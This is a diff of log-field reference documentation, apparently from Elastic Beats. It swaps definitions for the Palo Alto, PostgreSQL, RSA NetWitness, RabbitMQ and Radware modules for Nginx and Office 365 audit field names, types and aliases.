-*`panw.panos.url.category`*:: -+ --- -For threat URLs, it's the URL category. For WildFire, the verdict on the file and is either 'malicious', 'grayware', or 'benign'. - - -type: keyword - --- - -*`panw.panos.flow_id`*:: -+ --- -Internal numeric identifier for each session. - - -type: keyword - --- - -*`panw.panos.sequence_number`*:: -+ --- -Log entry identifier that is incremented sequentially. Unique for each log type. - - -type: long - --- - -*`panw.panos.threat.resource`*:: -+ --- -URL or file name for a threat. - - -type: keyword - --- - -*`panw.panos.threat.id`*:: -+ --- -Palo Alto Networks identifier for the threat. - - -type: keyword - --- - -*`panw.panos.threat.name`*:: -+ --- -Palo Alto Networks name for the threat. - - -type: keyword - --- - -*`panw.panos.action`*:: -+ --- -Action taken for the session. - -type: keyword - --- - -*`panw.panos.type`*:: -+ --- -Specifies the type of the log - --- - -*`panw.panos.sub_type`*:: -+ --- -Specifies the sub type of the log - --- - -[[exported-fields-postgresql]] -== PostgreSQL fields - -Module for parsing the PostgreSQL log files. - - - -[float] -=== postgresql - -Fields from PostgreSQL logs. - - - -[float] -=== log - -Fields from the PostgreSQL log files. - - - -*`postgresql.log.timestamp`*:: -+ --- - -deprecated:[7.3.0] - -The timestamp from the log line. - - --- - -*`postgresql.log.core_id`*:: -+ --- -Core id - - -type: long - --- - -*`postgresql.log.database`*:: -+ --- -Name of database - - -example: mydb - --- - -*`postgresql.log.query`*:: -+ --- -Query statement. - - -example: SELECT * FROM users; - --- - -*`postgresql.log.query_step`*:: -+ --- -Statement step when using extended query protocol (one of statement, parse, bind or execute) - - -example: parse - --- - -*`postgresql.log.query_name`*:: -+ --- -Name given to a query when using extended query protocol. If it is "", or not present, this field is ignored. - - -example: pdo_stmt_00000001 - --- - -*`postgresql.log.error.code`*:: -+ --- -Error code returned by Postgres (if any) - -type: long - --- - -*`postgresql.log.timezone`*:: -+ --- -type: alias - -alias to: event.timezone - --- - -*`postgresql.log.thread_id`*:: -+ --- -type: alias - -alias to: process.pid - --- - -*`postgresql.log.user`*:: -+ --- -type: alias - -alias to: user.name - --- - -*`postgresql.log.level`*:: -+ --- -type: alias - -alias to: log.level - --- - -*`postgresql.log.message`*:: -+ --- -type: alias - -alias to: message - --- - -[[exported-fields-process]] -== Process fields - -Process metadata fields - - - - -*`process.exe`*:: -+ --- -type: alias - -alias to: process.executable - --- - -[[exported-fields-proofpoint]] -== Proofpoint Email Security fields - -proofpoint fields. - - - -*`network.interface.name`*:: -+ --- -Name of the network interface where the traffic has been observed. - - -type: keyword - --- - - - -*`rsa.internal.msg`*:: -+ --- -This key is used to capture the raw message that comes into the Log Decoder - -type: keyword - --- - -*`rsa.internal.messageid`*:: -+ --- -type: keyword - --- - -*`rsa.internal.event_desc`*:: -+ --- -type: keyword - --- - -*`rsa.internal.message`*:: -+ --- -This key captures the contents of instant messages - -type: keyword - --- - -*`rsa.internal.time`*:: -+ --- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. - -type: date - --- - -*`rsa.internal.level`*:: -+ --- -Deprecated key defined only in table map. - -type: long - --- - -*`rsa.internal.msg_id`*:: -+ --- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.msg_vid`*:: -+ --- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.data`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.obj_server`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.obj_val`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.resource`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.obj_id`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.statement`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.audit_class`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.entry`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.hcode`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.inode`*:: -+ --- -Deprecated key defined only in table map. - -type: long - --- - -*`rsa.internal.resource_class`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.dead`*:: -+ --- -Deprecated key defined only in table map. - -type: long - --- - -*`rsa.internal.feed_desc`*:: -+ --- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.feed_name`*:: -+ --- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.cid`*:: -+ --- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.device_class`*:: -+ --- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.device_group`*:: -+ --- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.device_host`*:: -+ --- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.device_ip`*:: -+ --- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip - --- - -*`rsa.internal.device_ipv6`*:: -+ --- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip - --- - -*`rsa.internal.device_type`*:: -+ --- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.device_type_id`*:: -+ --- -Deprecated key defined only in table map. - -type: long - --- - -*`rsa.internal.did`*:: -+ --- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.entropy_req`*:: -+ --- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long - --- - -*`rsa.internal.entropy_res`*:: -+ --- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long - --- - -*`rsa.internal.event_name`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.feed_category`*:: -+ --- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.forward_ip`*:: -+ --- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip - --- - -*`rsa.internal.forward_ipv6`*:: -+ --- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip - --- - -*`rsa.internal.header_id`*:: -+ --- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.lc_cid`*:: -+ --- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.lc_ctime`*:: -+ --- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date - --- - -*`rsa.internal.mcb_req`*:: -+ --- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - -type: long - --- - -*`rsa.internal.mcb_res`*:: -+ --- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - -type: long - --- - -*`rsa.internal.mcbc_req`*:: -+ --- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long - --- - -*`rsa.internal.mcbc_res`*:: -+ --- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long - --- - -*`rsa.internal.medium`*:: -+ --- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - -type: long - --- - -*`rsa.internal.node_name`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.nwe_callback_id`*:: -+ --- -This key denotes that event is endpoint related - -type: keyword - --- - -*`rsa.internal.parse_error`*:: -+ --- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.payload_req`*:: -+ --- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long - --- - -*`rsa.internal.payload_res`*:: -+ --- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long - --- - -*`rsa.internal.process_vid_dst`*:: -+ --- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - -type: keyword - --- - -*`rsa.internal.process_vid_src`*:: -+ --- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - -type: keyword - --- - -*`rsa.internal.rid`*:: -+ --- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long - --- - -*`rsa.internal.session_split`*:: -+ --- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.site`*:: -+ --- -Deprecated key defined only in table map. - -type: keyword - --- - -*`rsa.internal.size`*:: -+ --- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long - --- - -*`rsa.internal.sourcefile`*:: -+ --- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword - --- - -*`rsa.internal.ubc_req`*:: -+ --- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: long -- @@ -110876,1737 +109966,9882 @@ type: keyword -- -[[exported-fields-rabbitmq]] -== RabbitMQ fields +[[exported-fields-nginx]] +== Nginx fields -RabbitMQ Module +Module for parsing the Nginx log files. [float] -=== rabbitmq +=== nginx +Fields from the Nginx log files. [float] -=== log +=== access -RabbitMQ log files +Contains fields for the Nginx access logs. -*`rabbitmq.log.pid`*:: +*`nginx.access.remote_ip_list`*:: + -- -The Erlang process id +An array of remote IP addresses. It is a list because it is common to include, besides the client IP address, IP addresses from headers like `X-Forwarded-For`. Real source IP is restored to `source.ip`. -type: keyword -example: <0.222.0> +type: array -- -[[exported-fields-radware]] -== Radware DefensePro fields - -radware fields. - - - -*`network.interface.name`*:: +*`nginx.access.body_sent.bytes`*:: + -- -Name of the network interface where the traffic has been observed. +type: alias +alias to: http.response.body.bytes -type: keyword +-- +*`nginx.access.user_name`*:: ++ -- +type: alias +alias to: user.name +-- -*`rsa.internal.msg`*:: +*`nginx.access.method`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder +type: alias -type: keyword +alias to: http.request.method -- -*`rsa.internal.messageid`*:: +*`nginx.access.url`*:: + -- -type: keyword +type: alias + +alias to: url.original -- -*`rsa.internal.event_desc`*:: +*`nginx.access.http_version`*:: + -- -type: keyword +type: alias + +alias to: http.version -- -*`rsa.internal.message`*:: +*`nginx.access.response_code`*:: + -- -This key captures the contents of instant messages +type: alias -type: keyword +alias to: http.response.status_code -- -*`rsa.internal.time`*:: +*`nginx.access.referrer`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. +type: alias -type: date +alias to: http.request.referrer -- -*`rsa.internal.level`*:: +*`nginx.access.agent`*:: + -- -Deprecated key defined only in table map. +type: alias -type: long +alias to: user_agent.original -- -*`rsa.internal.msg_id`*:: + +*`nginx.access.user_agent.device`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: user_agent.device.name -- -*`rsa.internal.msg_vid`*:: +*`nginx.access.user_agent.name`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: user_agent.name -- -*`rsa.internal.data`*:: +*`nginx.access.user_agent.os`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: user_agent.os.full_name -- -*`rsa.internal.obj_server`*:: +*`nginx.access.user_agent.os_name`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: user_agent.os.name -- -*`rsa.internal.obj_val`*:: +*`nginx.access.user_agent.original`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: user_agent.original -- -*`rsa.internal.resource`*:: + +*`nginx.access.geoip.continent_name`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.continent_name -- -*`rsa.internal.obj_id`*:: +*`nginx.access.geoip.country_iso_code`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.country_iso_code -- -*`rsa.internal.statement`*:: +*`nginx.access.geoip.location`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.location -- -*`rsa.internal.audit_class`*:: +*`nginx.access.geoip.region_name`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.region_name -- -*`rsa.internal.entry`*:: +*`nginx.access.geoip.city_name`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.city_name -- -*`rsa.internal.hcode`*:: +*`nginx.access.geoip.region_iso_code`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.region_iso_code -- -*`rsa.internal.inode`*:: +[float] +=== error + +Contains fields for the Nginx error logs. + + + +*`nginx.error.connection_id`*:: + -- -Deprecated key defined only in table map. +Connection identifier. + type: long -- -*`rsa.internal.resource_class`*:: +*`nginx.error.level`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: log.level -- -*`rsa.internal.dead`*:: +*`nginx.error.pid`*:: + -- -Deprecated key defined only in table map. +type: alias -type: long +alias to: process.pid -- -*`rsa.internal.feed_desc`*:: +*`nginx.error.tid`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: process.thread.id -- -*`rsa.internal.feed_name`*:: +*`nginx.error.message`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: message -- -*`rsa.internal.cid`*:: -+ --- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +[float] +=== ingress_controller -type: keyword +Contains fields for the Ingress Nginx controller access logs. --- -*`rsa.internal.device_class`*:: + +*`nginx.ingress_controller.remote_ip_list`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +An array of remote IP addresses. It is a list because it is common to include, besides the client IP address, IP addresses from headers like `X-Forwarded-For`. Real source IP is restored to `source.ip`. -type: keyword + +type: array -- -*`rsa.internal.device_group`*:: +*`nginx.ingress_controller.upstream_address_list`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +An array of the upstream addresses. It is a list because it is common that several upstream servers were contacted during request processing. + type: keyword -- -*`rsa.internal.device_host`*:: +*`nginx.ingress_controller.upstream.response.length_list`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +An array of upstream response lengths. It is a list because it is common that several upstream servers were contacted during request processing. + type: keyword -- -*`rsa.internal.device_ip`*:: +*`nginx.ingress_controller.upstream.response.time_list`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +An array of upstream response durations. It is a list because it is common that several upstream servers were contacted during request processing. -type: ip + +type: keyword -- -*`rsa.internal.device_ipv6`*:: +*`nginx.ingress_controller.upstream.response.status_code_list`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +An array of upstream response status codes. It is a list because it is common that several upstream servers were contacted during request processing. -type: ip + +type: keyword -- -*`rsa.internal.device_type`*:: +*`nginx.ingress_controller.http.request.length`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +The request length (including request line, header, and request body) -type: keyword + +type: long + +format: bytes -- -*`rsa.internal.device_type_id`*:: +*`nginx.ingress_controller.http.request.time`*:: + -- -Deprecated key defined only in table map. +Time elapsed since the first bytes were read from the client -type: long + +type: double + +format: duration -- -*`rsa.internal.did`*:: +*`nginx.ingress_controller.upstream.name`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +The name of the upstream. + type: keyword -- -*`rsa.internal.entropy_req`*:: +*`nginx.ingress_controller.upstream.alternative_name`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration +The name of the alternative upstream. -type: long + +type: keyword -- -*`rsa.internal.entropy_res`*:: +*`nginx.ingress_controller.upstream.response.length`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration +The length of the response obtained from the upstream server. If several servers were contacted during request process, the summary of the multiple response lengths is stored. + type: long +format: bytes + -- -*`rsa.internal.event_name`*:: +*`nginx.ingress_controller.upstream.response.time`*:: + -- -Deprecated key defined only in table map. +The time spent on receiving the response from the upstream as seconds with millisecond resolution. If several servers were contacted during request process, the summary of the multiple response times is stored. -type: keyword + +type: double + +format: duration -- -*`rsa.internal.feed_category`*:: +*`nginx.ingress_controller.upstream.response.status_code`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +The status code of the response obtained from the upstream server. If several servers were contacted during request process, only the status code of the response from the last one is stored in this field. -type: keyword + +type: long -- -*`rsa.internal.forward_ip`*:: +*`nginx.ingress_controller.upstream.ip`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. +The IP address of the upstream server. If several servers were contacted during request process, only the last one is stored in this field. + type: ip -- -*`rsa.internal.forward_ipv6`*:: +*`nginx.ingress_controller.upstream.port`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +The port of the upstream server. If several servers were contacted during request process, only the last one is stored in this field. -type: ip + +type: long -- -*`rsa.internal.header_id`*:: +*`nginx.ingress_controller.http.request.id`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +The randomly generated ID of the request + type: keyword -- -*`rsa.internal.lc_cid`*:: +*`nginx.ingress_controller.body_sent.bytes`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: http.response.body.bytes -- -*`rsa.internal.lc_ctime`*:: +*`nginx.ingress_controller.user_name`*:: + -- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: date +alias to: user.name -- -*`rsa.internal.mcb_req`*:: +*`nginx.ingress_controller.method`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most +type: alias -type: long +alias to: http.request.method -- -*`rsa.internal.mcb_res`*:: +*`nginx.ingress_controller.url`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most +type: alias -type: long +alias to: url.original -- -*`rsa.internal.mcbc_req`*:: +*`nginx.ingress_controller.http_version`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams +type: alias -type: long +alias to: http.version -- -*`rsa.internal.mcbc_res`*:: +*`nginx.ingress_controller.response_code`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams +type: alias -type: long +alias to: http.response.status_code -- -*`rsa.internal.medium`*:: +*`nginx.ingress_controller.referrer`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session +type: alias -type: long +alias to: http.request.referrer -- -*`rsa.internal.node_name`*:: +*`nginx.ingress_controller.agent`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: user_agent.original -- -*`rsa.internal.nwe_callback_id`*:: + +*`nginx.ingress_controller.user_agent.device`*:: + -- -This key denotes that event is endpoint related +type: alias -type: keyword +alias to: user_agent.device.name -- -*`rsa.internal.parse_error`*:: +*`nginx.ingress_controller.user_agent.name`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: user_agent.name -- -*`rsa.internal.payload_req`*:: +*`nginx.ingress_controller.user_agent.os`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep +type: alias -type: long +alias to: user_agent.os.full_name -- -*`rsa.internal.payload_res`*:: +*`nginx.ingress_controller.user_agent.os_name`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep +type: alias -type: long +alias to: user_agent.os.name -- -*`rsa.internal.process_vid_dst`*:: +*`nginx.ingress_controller.user_agent.original`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. +type: alias -type: keyword +alias to: user_agent.original -- -*`rsa.internal.process_vid_src`*:: + +*`nginx.ingress_controller.geoip.continent_name`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. +type: alias -type: keyword +alias to: source.geo.continent_name -- -*`rsa.internal.rid`*:: +*`nginx.ingress_controller.geoip.country_iso_code`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: long +alias to: source.geo.country_iso_code -- -*`rsa.internal.session_split`*:: +*`nginx.ingress_controller.geoip.location`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: source.geo.location -- -*`rsa.internal.site`*:: +*`nginx.ingress_controller.geoip.region_name`*:: + -- -Deprecated key defined only in table map. +type: alias -type: keyword +alias to: source.geo.region_name -- -*`rsa.internal.size`*:: +*`nginx.ingress_controller.geoip.city_name`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: long +alias to: source.geo.city_name -- -*`rsa.internal.sourcefile`*:: +*`nginx.ingress_controller.geoip.region_iso_code`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: alias -type: keyword +alias to: source.geo.region_iso_code -- -*`rsa.internal.ubc_req`*:: -+ --- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once +[[exported-fields-o365]] +== Office 365 fields -type: long +Module for handling logs from Office 365. --- -*`rsa.internal.ubc_res`*:: -+ --- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once -type: long +[float] +=== o365.audit --- +Fields from Office 365 Management API audit logs. -*`rsa.internal.word`*:: + + +*`o365.audit.AADGroupId`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`o365.audit.Actor`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: array -- -*`rsa.time.duration_time`*:: +*`o365.audit.ActorContextId`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`o365.audit.ActorIpAddress`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`o365.audit.ActorUserId`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: +*`o365.audit.ActorYammerUserId`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`o365.audit.AlertEntityId`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: +*`o365.audit.AlertId`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`o365.audit.AlertLinks`*:: + -- -This key is used to capture the timezone of the Event Time - -type: keyword +type: array -- -*`rsa.time.duration_str`*:: +*`o365.audit.AlertType`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`o365.audit.AppId`*:: + -- type: keyword -- -*`rsa.time.year`*:: +*`o365.audit.ApplicationDisplayName`*:: + -- type: keyword -- -*`rsa.time.recorded_time`*:: +*`o365.audit.ApplicationId`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`o365.audit.AzureActiveDirectoryEventType`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`o365.audit.ExchangeMetaData.*`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: object -- -*`rsa.time.expire_time`*:: +*`o365.audit.Category`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: keyword -- -*`rsa.time.process_time`*:: +*`o365.audit.ClientAppId`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`o365.audit.ClientInfoString`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`o365.audit.ClientIP`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`o365.audit.ClientIPAddress`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`o365.audit.Comments`*:: + -- -This key is the Time that the event was queued. - -type: date +type: text -- -*`rsa.time.p_time1`*:: +*`o365.audit.CommunicationType`*:: + -- type: keyword -- -*`rsa.time.tzone`*:: +*`o365.audit.CorrelationId`*:: + -- type: keyword -- -*`rsa.time.eventtime`*:: +*`o365.audit.CreationTime`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`o365.audit.CustomUniqueId`*:: + -- type: keyword -- -*`rsa.time.gmttime`*:: +*`o365.audit.Data`*:: + -- type: keyword -- -*`rsa.time.p_date`*:: +*`o365.audit.DataType`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`o365.audit.DoNotDistributeEvent`*:: + -- -type: keyword +type: boolean -- -*`rsa.time.p_time`*:: +*`o365.audit.EntityType`*:: + -- type: keyword -- -*`rsa.time.p_time2`*:: +*`o365.audit.ErrorNumber`*:: + -- type: keyword -- -*`rsa.time.p_year`*:: +*`o365.audit.EventData`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`o365.audit.EventSource`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - type: keyword -- -*`rsa.time.stamp`*:: +*`o365.audit.ExceptionInfo.*`*:: + -- -Deprecated key defined only in table map. - -type: date +type: object -- - -*`rsa.misc.action`*:: +*`o365.audit.ExtendedProperties.*`*:: + -- -type: keyword +type: object -- -*`rsa.misc.result`*:: +*`o365.audit.ExternalAccess`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - type: keyword -- -*`rsa.misc.severity`*:: +*`o365.audit.FromApp`*:: + -- -This key is used to capture the severity given the session - -type: keyword +type: boolean -- -*`rsa.misc.event_type`*:: 